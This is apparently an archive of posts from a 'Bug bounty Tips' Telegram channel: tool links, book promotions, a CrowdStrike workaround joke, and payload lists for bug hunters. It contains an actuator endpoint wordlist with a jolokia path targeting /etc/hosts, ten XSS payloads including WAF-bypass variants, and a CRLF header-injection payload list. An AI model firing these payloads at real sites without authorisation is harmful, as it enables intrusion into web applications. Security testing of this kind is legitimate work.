اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Bug bounty Tips
رفتن به کانال در Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
نمایش بیشتر5 812
مشترکین
+824 ساعت
+657 روز
+39030 روز
آرشیو پست ها
5 812
I am looking for an admin who can post content and intaract anyone is here and anyone already running a channel also eligible. I will make him a admin but have some terms and conditions.
5 812
Check out this new vdp program for this week, give an update and let me know anyone working on this program atleast and final give a lot of reaction so that I can know that it is worth sharing things in this group
New VDP Program - https://www.sonova.com/.well-known/security.txt
5 812
#PacktPub | Bug Bounty from Scratch : A comprehensive guide to discovering vulnerabilities and succeeding in cybersecurity
Info : https://www.packtpub.com/en-us/product/bug-bounty-from-scratch-9781803239255
5 812
PowerShell for Penetration Testing.
Explore the capabilities of PowerShell for pentesters across multiple platforms by Dr. Andrew Blyth, 2024
5 812
😎Add this to your wordlist:
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/configprops
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/hosts
#bugbountytip #bugbountytips #bugbounty
5 812
🚀A Practical Guide to Starting Your Cybersecurity Career in India🚀
✈️Link- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI
5 812
I have share a video on which operating system is better on instagram so do check it out guys
https://www.instagram.com/reel/C9ww22ry8Ub/?igsh=MzRlODBiNWFlZA==
5 812
🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe
5 812
🔖10 Juicy XSS payloads that you can use.
1️⃣. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634
2️⃣. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag
3️⃣. <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass
4️⃣. ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the
5️⃣. <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>
6️⃣. <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/
7️⃣. <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera
8️⃣. <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
9️⃣. <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
1️⃣🅾️. jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)
🐱 github
💡You can check the group for more resources
#XSS #BugBounty #BugBountyTips
🔸🔸 Share & Support Us 🔸 🔸
✔️ Channel: @bugbounty_tech
👥 Group: @bugbounty_talks
5 812
You know guys, for today it's going to be a 1yr, starting this channel, I didn't expect that I am going to reach till here that too near 1k followers, I would like to thank one and all.
At first I was losing hope that this is not going to happen but today I realised that a long term goal can keep you happy and being more consistent can do lot of wonders.
Thanks everyone and I will workhard on giving you guys more and more better BugBounty tips.
And I have took a challenge that cipherops should be a part of the reason that everyone get there first bounty happily.
5 812
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
✅Download- https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
5 812
How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
5 812
Bug Bounty Tip
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
5 812
Just discovered https://web-check.xyz and recommend that you do to!
It's an ALL-IN-ONE OSINT tool for analysing websites. You give it a URL and it gives you:
Server Location and IP info
SSL Certificate
Domain Whois
Server info
Cookies
Headers
DNS Records
HTTP Security
Social Tags
Security.txt
DNS Server
Firewall
DNS Security
HSTS Check
Threats
TLS Cipher Suites
TLS Security Issues
TLS Handshake Simulation
Redirects
Linked Pages
Crawl Rules
Server Status
Open ports
Text records
Carbon footprint
